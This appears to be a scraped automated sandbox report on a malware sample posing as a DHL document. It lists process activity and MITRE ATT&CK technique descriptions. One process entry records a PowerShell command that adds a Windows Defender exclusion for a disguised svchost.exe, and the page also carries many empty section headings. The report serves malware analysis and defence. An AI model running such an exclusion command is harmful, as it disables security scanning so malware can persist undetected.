Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe' -Force
Imagebase:	0x870000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exe PID: 7084 Parent PID: 6636

General

Start time:	08:43:04
Start date:	07/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff774ee0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 5488 Parent PID: 560

General

Start time:	08:43:06
Start date:	07/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff641cd0000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 6084 Parent PID: 4140

General

Start time:	08:43:26
Start date:	07/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe
Imagebase:	0xc0000
File size:	83728 bytes
MD5 hash:	DC8E7CDE980F05501758F8CE3048682E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 1156 Parent PID: 4140

General

Start time:	08:43:29
Start date:	07/04/2021
Path:	C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe
Imagebase:
File size:	83728 bytes
MD5 hash:	DC8E7CDE980F05501758F8CE3048682E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report DHL_document11022020680908911.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre